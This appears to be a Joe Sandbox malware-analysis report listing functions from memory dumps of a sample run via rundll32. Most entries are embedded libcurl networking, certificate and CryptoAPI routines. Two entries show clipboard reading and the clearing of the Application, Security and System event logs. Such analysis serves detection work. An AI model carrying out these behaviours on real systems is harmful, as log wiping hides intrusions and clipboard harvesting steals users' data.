Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: CertCertificateContext$CryptErrorFreeLastObjectQueryStore
String ID: -----END CERTIFICATE-----$-----BEGIN CERTIFICATE-----$schannel: CA file '%s' is not correctly formatted$schannel: added %d certificate(s) from CA file '%s'$schannel: did not add any certificates from CA file '%s'$schannel: failed to add certificate from CA file '%s' to certificate store: %s$schannel: failed to extract certificate from CA file '%s': %s$schannel: unexpected content type '%d' when extracting certificate from CA file '%s'
API String ID: 854292303-665156428
Opcode ID: f2256ad029abc3f23003c91e8d81e9546277946cb09730639be554221540a80a
Instruction ID: 06f304d00a4b27252b9ea4999f3f0ece511e3d88cfae0c0dbe96ad5664daae78
Opcode Fuzzy Hash: f2256ad029abc3f23003c91e8d81e9546277946cb09730639be554221540a80a
Instruction Fuzzy Hash: 4E41D17150C352ABF3219F248C00F6FBBE8FB89708F02091DF688A62A1D775D5148B9A

Function 6D013BC0 Relevance: 19.3, Strings: 15, Instructions: 588COMMON

Download Yara Rule

Strings

%s, xrefs: 6D013DE3
Failed sending PUT request, xrefs: 6D013CD8
0, xrefs: 6D014112, 6D0141CC
Expect, xrefs: 6D013E02, 6D013F93
Failed sending POST request, xrefs: 6D013D5D, 6D013ECA
Content-Length, xrefs: 6D013C48, 6D013DA8, 6D013F37
Content-Length: %I64d, xrefs: 6D013C60, 6D013DC0, 6D013F4F
%x, xrefs: 6D014082
Failed sending HTTP request, xrefs: 6D0142B6
100-continue, xrefs: 6D013E16, 6D013FA7
Failed sending HTTP POST request, xrefs: 6D014252
Expect:, xrefs: 6D013E1D, 6D013FAE
Content-Length: 0, xrefs: 6D013D23
Content-Type, xrefs: 6D013F67
Content-Type: application/x-www-form-urlencoded, xrefs: 6D013F7B

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID:
String ID: %s$%x$0$100-continue$Content-Length$Content-Length: %I64d$Content-Length: 0$Content-Type$Content-Type: application/x-www-form-urlencoded$Expect$Expect:$Failed sending HTTP POST request$Failed sending HTTP request$Failed sending POST request$Failed sending PUT request
API String ID: 0-502057143
Opcode ID: d8d1b7f73c8c2d35fd31064ccaf0c7fb366802cc293a5a1c5c7432e6239ee8fe
Instruction ID: a9b53d119bb2104ae79e7c900e9fd172e9faedd21a8d0df181afd2c495ff9d95
Opcode Fuzzy Hash: d8d1b7f73c8c2d35fd31064ccaf0c7fb366802cc293a5a1c5c7432e6239ee8fe
Instruction Fuzzy Hash: C5120675A0C706BBF3109BE4DC41FA7B7E8BF0831CF404929F929A6292E735E5548792

Function 6D03F9F0 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 157encryptionCOMMON

Download Yara Rule

APIs

Part of subcall function 6D03B400: GetModuleHandleA.KERNEL32(ntdll,RtlVerifyVersionInfo,00000000,?), ref: 6D03B42E
Part of subcall function 6D03B400: GetProcAddress.KERNEL32(00000000), ref: 6D03B435

CertGetNameStringA.CRYPT32(?,00000006,00010002,00000000,?,?), ref: 6D03FA3E

Strings

schannel: CertFindExtension() returned no extension., xrefs: 6D03FAA5
schannel: Null certificate info., xrefs: 6D03FA89
schannel: Not enough memory to list all host names., xrefs: 6D03FBC7
schannel: CryptDecodeObjectEx() returned no alternate name information., xrefs: 6D03FAE2
schannel: Empty DNS name., xrefs: 6D03FB31
2.5.29.17, xrefs: 6D03FA96, 6D03FACE
schannel: Null certificate context., xrefs: 6D03FA7B

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: AddressCertHandleModuleNameProcString
String ID: 2.5.29.17$schannel: CertFindExtension() returned no extension.$schannel: CryptDecodeObjectEx() returned no alternate name information.$schannel: Empty DNS name.$schannel: Not enough memory to list all host names.$schannel: Null certificate context.$schannel: Null certificate info.
API String ID: 4138448956-2160583098
Opcode ID: 426de16b39926d5f5f33868c726d9b7f3a33f78011e3d127b4730febe20760fb
Instruction ID: 9dc178d22e853ddd6d5064e4f194382a54ca730f3cd9646d9907f823c1e2ebbf
Opcode Fuzzy Hash: 426de16b39926d5f5f33868c726d9b7f3a33f78011e3d127b4730febe20760fb
Instruction Fuzzy Hash: 42510071208353EFF7108F04C850BAABBE9FF85748F51445CFA945B292D3B69588CB96

Function 6D003340 Relevance: 16.1, APIs: 2, Strings: 7, Instructions: 382COMMON

Download Yara Rule

APIs

__vfprintf_l.LIBCMT ref: 6D0033E9

Strings

-----BEGIN PUBLIC KEY-----, xrefs: 6D003665
Z, xrefs: 6D003788
sha256//, xrefs: 6D003388, 6D0034E7
public key hash: sha256//%s, xrefs: 6D00340C
;sha256//, xrefs: 6D003465
Z, xrefs: 6D003358
-----END PUBLIC KEY-----, xrefs: 6D003692

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: __vfprintf_l
String ID: -----END PUBLIC KEY-----$ public key hash: sha256//%s$-----BEGIN PUBLIC KEY-----$;sha256//$Z$Z$sha256//
API String ID: 86772892-1456817947
Opcode ID: 2712e74e0a1cffb06682625dceda672356b3a87e0d251e24630d3a287daf80c1
Instruction ID: 0bc624d24cc44d6310a279b0b95e2f50d1269032e7b82ed331b2b3940a1f768d
Opcode Fuzzy Hash: 2712e74e0a1cffb06682625dceda672356b3a87e0d251e24630d3a287daf80c1
Instruction Fuzzy Hash: 30C1587590C7412BF7135F289C40F3F7BF5AF8A228F554658E8994B381E732E4068792

Function 6D02FAF0 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 227COMMON

Download Yara Rule

APIs

sendto.WS2_32(?,?,00000004,00000000,?,?), ref: 6D02FBC1
sendto.WS2_32(?,?,00000004,00000000,?,?), ref: 6D02FC93
sendto.WS2_32(?,?,00000004,00000000,?,?), ref: 6D02FDD3

Strings

Received unexpected DATA packet block %d, expecting block %d, xrefs: 6D02FC14
Timeout waiting for block %d ACK. Retries = %d, xrefs: 6D02FCE1
tftp_rx: internal error, xrefs: 6D02FDF9
Received last DATA packet block %d again., xrefs: 6D02FB61

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: sendto
String ID: Received last DATA packet block %d again.$Received unexpected DATA packet block %d, expecting block %d$Timeout waiting for block %d ACK. Retries = %d$tftp_rx: internal error
API String ID: 1876886790-2298932677
Opcode ID: 9f2e8d18e0a942a5ecf7ceab1acad30f7fe2b6b3c92cf985f868e42a36eafe0a
Instruction ID: 3583432b0388aabd07927654bcd9122e6b72078ad93fa5a4dfc0c1e9e7a374fd
Opcode Fuzzy Hash: 9f2e8d18e0a942a5ecf7ceab1acad30f7fe2b6b3c92cf985f868e42a36eafe0a
Instruction Fuzzy Hash: 5C91AF752047409FE7319B28D881BEBBBE4FF49305F44482EEA9EC72A1D775A444CB92

Function 6D047190 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 56encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000040,?,?,00000000), ref: 6D0471A3
CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 6D0471BF
CryptHashData.ADVAPI32(?,?,00000000,00000000), ref: 6D0471DC
CryptGetHashParam.ADVAPI32(?,00000002,00000000,00000000), ref: 6D0471F9
CryptGetHashParam.ADVAPI32(?,00000002,?,00000000,00000000), ref: 6D047216
CryptDestroyHash.ADVAPI32(?), ref: 6D047225
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 6D047236

Strings

, xrefs: 6D0471FF

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: Crypt$Hash$ContextParam$AcquireCreateDataDestroyRelease
String ID:
API String ID: 3606780921-3916222277
Opcode ID: 3bdc4efedc6cec46306aa84812f7c00897506034b4543cafa59f7af86a54eb46
Instruction ID: 3de2a6d711aa8120941230aa9116ee6ffc27b380dec2eed8570173868778f6fb
Opcode Fuzzy Hash: 3bdc4efedc6cec46306aa84812f7c00897506034b4543cafa59f7af86a54eb46
Instruction Fuzzy Hash: 85110A70648305BBFB109F51CD0AF1E7BF8BB85B11F508828B684E90E1D7B1D8589B96

Function 6D042260 Relevance: 13.4, Strings: 10, Instructions: 900COMMON

Download Yara Rule

Strings

%u%.2s-%.2s-%.2s %.2s:%.2s:%.2s %.*s, xrefs: 6D0424B9, 6D0429C9
TRUE, xrefs: 6D042348, 6D042355, 6D042855, 6D042862
0, xrefs: 6D042A4A
0, xrefs: 6D042A12
,, xrefs: 6D042A66
GMT, xrefs: 6D04259A, 6D042AA8
%.4s-%.2s-%.2s %.2s:%.2s:%c%c%s%.*s%s%.*s, xrefs: 6D0425E0, 6D042AEE
%s%x, xrefs: 6D0423B1, 6D0428BE
GMT, xrefs: 6D04248A, 6D042497, 6D04299A, 6D0429A7
FALSE, xrefs: 6D04234D, 6D04285A

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID:
String ID: GMT$%.4s-%.2s-%.2s %.2s:%.2s:%c%c%s%.*s%s%.*s$%s%x$%u%.2s-%.2s-%.2s %.2s:%.2s:%.2s %.*s$,$0$0$FALSE$GMT$TRUE
API String ID: 0-234648713
Opcode ID: bacc8ed75115f056c03aa8ac752bd560be481ed0ab9028d5ac7c7ba272436f33
Instruction ID: 75fa1cfd201fe6e009166313835152982a7d59cfd631a1330b5574a37d351670
Opcode Fuzzy Hash: bacc8ed75115f056c03aa8ac752bd560be481ed0ab9028d5ac7c7ba272436f33
Instruction Fuzzy Hash: 25620574B08282DFF7258E388890F6B7BE6ABCA304F14C93DE581CB246D635D945C762

Function 6D048280 Relevance: 12.9, Strings: 10, Instructions: 364COMMON

Download Yara Rule

Strings

blank, xrefs: 6D04853D
alnum, xrefs: 6D048353
xdigit, xrefs: 6D0483F9
lower, xrefs: 6D0485DF
alpha, xrefs: 6D0483A8
upper, xrefs: 6D04858E
print, xrefs: 6D04844A
graph, xrefs: 6D04849B
space, xrefs: 6D0484EC
digit, xrefs: 6D0482D7

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID:
String ID: alnum$alpha$blank$digit$graph$lower$print$space$upper$xdigit
API String ID: 0-2602438971
Opcode ID: abcbb587212fe67ef7517abb5c51a6b5c7b963d7a9e84559c8938fdad2d33fa9
Instruction ID: 278c0db6b36aaa398806261522949163c252385eb28dd7203b7b7bf0cd5cab97
Opcode Fuzzy Hash: abcbb587212fe67ef7517abb5c51a6b5c7b963d7a9e84559c8938fdad2d33fa9
Instruction Fuzzy Hash: 15B1DC6161C181CAE3119F3894A1BF67BE7AB97318FC8CCB9C8C5CB242E657D54D82D2

Function 6D041D00 Relevance: 11.6, Strings: 9, Instructions: 397COMMON

Download Yara Rule

Strings

%u%.2s-%.2s-%.2s %.2s:%.2s:%.2s %.*s, xrefs: 6D041EAC
TRUE, xrefs: 6D041D57, 6D041D5F
0, xrefs: 6D041EE0
%s: %s, xrefs: 6D04214C
GMT, xrefs: 6D041F5B
%.4s-%.2s-%.2s %.2s:%.2s:%c%c%s%.*s%s%.*s, xrefs: 6D041F9F
%s%x, xrefs: 6D041DBF
GMT, xrefs: 6D041E7D, 6D041E8A
FALSE, xrefs: 6D041D52

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID:
String ID: %s: %s$ GMT$%.4s-%.2s-%.2s %.2s:%.2s:%c%c%s%.*s%s%.*s$%s%x$%u%.2s-%.2s-%.2s %.2s:%.2s:%.2s %.*s$0$FALSE$GMT$TRUE
API String ID: 0-790606662
Opcode ID: 46e42f9579e8e427318577b136b2c25c29554444680ff02912075471a9a47340
Instruction ID: f6f168103fa02415aae7a0238a017a82a12d6f3baaf3bf8b03d8d7ca23dc8d70
Opcode Fuzzy Hash: 46e42f9579e8e427318577b136b2c25c29554444680ff02912075471a9a47340
Instruction Fuzzy Hash: 15C1CE75A08251DFF7324A398C40F7F7BE9EB9A344F04C938EA96CB252D221D951C762

Function 6D006D30 Relevance: 11.6, Strings: 9, Instructions: 353COMMON

Download Yara Rule

Strings

_proxy, xrefs: 6D006F5C
http_proxy, xrefs: 6D006F8D
NO_PROXY, xrefs: 6D006EA4, 6D006EA9
all_proxy, xrefs: 6D006FC5, 6D006FCA
space-separated NOPROXY patterns are deprecated, xrefs: 6D00700E
memory shortage, xrefs: 6D006E49
no_proxy, xrefs: 6D006E87, 6D006E8C
Uses proxy env variable %s == '%s', xrefs: 6D006EC6, 6D006FF3
ALL_PROXY, xrefs: 6D006FD9, 6D006FDE, 6D006FEE

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID:
String ID: ALL_PROXY$NO_PROXY$Uses proxy env variable %s == '%s'$_proxy$all_proxy$http_proxy$memory shortage$no_proxy$space-separated NOPROXY patterns are deprecated
API String ID: 0-2679089201
Opcode ID: 7fb3d095b89a72a6f27c9e25eaa533aae450214d8c3c245dacb218d52efa93e0
Instruction ID: a2778911df6ebdfc9a5984c12fb04d58c4548f5e019933502793ca16156c9772
Opcode Fuzzy Hash: 7fb3d095b89a72a6f27c9e25eaa533aae450214d8c3c245dacb218d52efa93e0
Instruction Fuzzy Hash: BED1B474908746AFF721DF35C844BAB7BF8AF86308F04442DE99987242E775E548CB62

Function 04EC60A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00000000), ref: 04EC60AA
GetClipboardData.USER32(00000001), ref: 04EC60BA
GlobalLock.KERNEL32(00000000), ref: 04EC60C4
GlobalUnlock.KERNEL32(?), ref: 04EC6193
CloseClipboard.USER32 ref: 04EC6199

Strings

NULL, xrefs: 04EC60D0

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock
String ID: NULL
API String ID: 1006321803-324932091
Opcode ID: 1d75e209addc2a44d1d34c2cc50d453036764d316d36043456051fa958997654
Instruction ID: 8ec9f4ea990419be25a758011b9c9621290b1a06c3d5d546debd86c395695112
Opcode Fuzzy Hash: 1d75e209addc2a44d1d34c2cc50d453036764d316d36043456051fa958997654
Instruction Fuzzy Hash: 483124B5804241AFC701CF38D858AD77BF9DF45305B0982A8E889CB306EA30E609C790

Function 6D01D4B0 Relevance: 10.6, APIs: 7, Instructions: 72encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000040,00000000,?), ref: 6D01D4FB
CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 6D01D51B
CryptHashData.ADVAPI32(?,?,?,00000000), ref: 6D01D533
CryptGetHashParam.ADVAPI32(?,00000004,?,?,00000000), ref: 6D01D54F
CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 6D01D570
CryptDestroyHash.ADVAPI32(?), ref: 6D01D57F
CryptReleaseContext.ADVAPI32(?,00000000), ref: 6D01D590

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: Crypt$Hash$ContextParam$AcquireCreateDataDestroyRelease
String ID:
API String ID: 3606780921-0
Opcode ID: b22f38fe272767b6faf0bc96024d2c64acb07032bef85cd2807ebcd8646c27e2
Instruction ID: f5af49af4412cd3c53c464a5cc2dced12ec3f995051c329c34277f455395ef28
Opcode Fuzzy Hash: b22f38fe272767b6faf0bc96024d2c64acb07032bef85cd2807ebcd8646c27e2
Instruction Fuzzy Hash: 222119B0608302ABFB109F51CC05F5B7BF8BB89B58F504918F684AA090D7B1D508DBA6

Function 6D048900 Relevance: 10.6, APIs: 7, Instructions: 57encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(?), ref: 6D048923
CryptCreateHash.ADVAPI32(00000000,00008002,00000000,00000000,00000001), ref: 6D04893F
CryptHashData.ADVAPI32(?,?,00000000,00000000,F0000040,?,00000000,00000000), ref: 6D04895C
CryptGetHashParam.ADVAPI32(?,00000002,00000000,?), ref: 6D048979
CryptGetHashParam.ADVAPI32(?,00000002,?,00000000,00000000), ref: 6D048996
CryptDestroyHash.ADVAPI32(?), ref: 6D0489A5
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 6D0489B6

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: Crypt$Hash$ContextParam$AcquireCreateDataDestroyRelease
String ID:
API String ID: 3606780921-0
Opcode ID: c5a244a10454f455027d2ff081dac3d716860cb953be2ebe53031ded37d46911
Instruction ID: ea9003b1238ea6b3ffa2f38333bc8019f2fff9763c2fa52dd91ac9016cccd03d
Opcode Fuzzy Hash: c5a244a10454f455027d2ff081dac3d716860cb953be2ebe53031ded37d46911
Instruction Fuzzy Hash: 4C11E670248306BBFB109F11CD0AF1E7BF8AB45B11F408828B684A91E1D7B1D8589BA7

Function 04EC58D0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 32COMMON

Download Yara Rule

APIs

OpenEventLogA.ADVAPI32(00000000,04ECB7EC), ref: 04EC58FD
ClearEventLogA.ADVAPI32(00000000,00000000), ref: 04EC5908
CloseEventLog.ADVAPI32(00000000), ref: 04EC590F

Strings

System, xrefs: 04EC58ED
Application, xrefs: 04EC58DF
Security, xrefs: 04EC58E6

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: Event$ClearCloseOpen
String ID: Application$Security$System
API String ID: 1391105993-2169399579
Opcode ID: 81567abecb15f9ba8158bdf40a2b3cb9bd38c16b07690b953f1c10c32638a36f
Instruction ID: 7527a7cb3fd2c34ed58f5aee50f832e1945dbc352cb450bcfdfe02940669a1a6
Opcode Fuzzy Hash: 81567abecb15f9ba8158bdf40a2b3cb9bd38c16b07690b953f1c10c32638a36f
Instruction Fuzzy Hash: FEF0A776A011247BD3119B9BED4AA8FF7BCFF45315F001168EA1893101C63079078795

Function 6D068688 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1473COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 6D06889F

Strings

1#INF, xrefs: 6D0687BE
1#IND, xrefs: 6D06878D
1#SNAN, xrefs: 6D068794
1#QNAN, xrefs: 6D06879B

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: da36895746b49667b337fbb6b64e1e602e17fdc46d84d5f6af23abb677413513
Instruction ID: 9d0b7b8b9e2d23a17716c4d75a18872b738f9ac46f7b2b871c02ee7751231c16
Opcode Fuzzy Hash: da36895746b49667b337fbb6b64e1e602e17fdc46d84d5f6af23abb677413513
Instruction Fuzzy Hash: 13D20771E082698FEB65CF28DD407EAB7F5EB45304F1441EAD80DE7280E778AA858F51

Function 6D017D10 Relevance: 10.2, Strings: 8, Instructions: 222COMMON

Download Yara Rule

Strings

%2I64d.%0I64dM, xrefs: 6D017E1A
%4I64dM, xrefs: 6D017E4C
%4I64dP, xrefs: 6D017F44
%5I64d, xrefs: 6D017D30
%4I64dT, xrefs: 6D017F37
%2I64d.%0I64dG, xrefs: 6D017EED
%4I64dG, xrefs: 6D017F1D
%4I64dk, xrefs: 6D017D62

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID:
String ID: %2I64d.%0I64dG$%2I64d.%0I64dM$%4I64dG$%4I64dM$%4I64dP$%4I64dT$%4I64dk$%5I64d
API String ID: 0-2102732564
Opcode ID: c6181c1a4656eded0ef0d697b07d90caf7c3ed6ac4a07c8dbe81dfa510abb5fb
Instruction ID: a6bd5b69df4a5fddc38295ea07776c54fda7bd515faeced0bf74d43bafff2c2f
Opcode Fuzzy Hash: c6181c1a4656eded0ef0d697b07d90caf7c3ed6ac4a07c8dbe81dfa510abb5fb
Instruction Fuzzy Hash: 76510672B1860A6BF70889ADDC81B7F71D9A7C9318F89053CF906D7392E698CD054196

Function 6D045D40 Relevance: 9.1, APIs: 6, Instructions: 114encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32 ref: 6D045D6B
CryptImportKey.ADVAPI32(?,?,00000014,00000000,00000000,?,F0000040,?,0000000E,0000000E,00000000,0000000E,?,?,0000000E,?), ref: 6D045E2A
CryptReleaseContext.ADVAPI32(?,00000000,?,6D02B622,?,?), ref: 6D045E3A
CryptEncrypt.ADVAPI32(?,00000000,00000000,00000000,?,?,?,?,6D02B622,?,?), ref: 6D045E74
CryptDestroyKey.ADVAPI32(?,?,6D02B622,?,?), ref: 6D045E7E
CryptReleaseContext.ADVAPI32(?,00000000,?,6D02B622,?,?), ref: 6D045E8A

Memory Dump Source

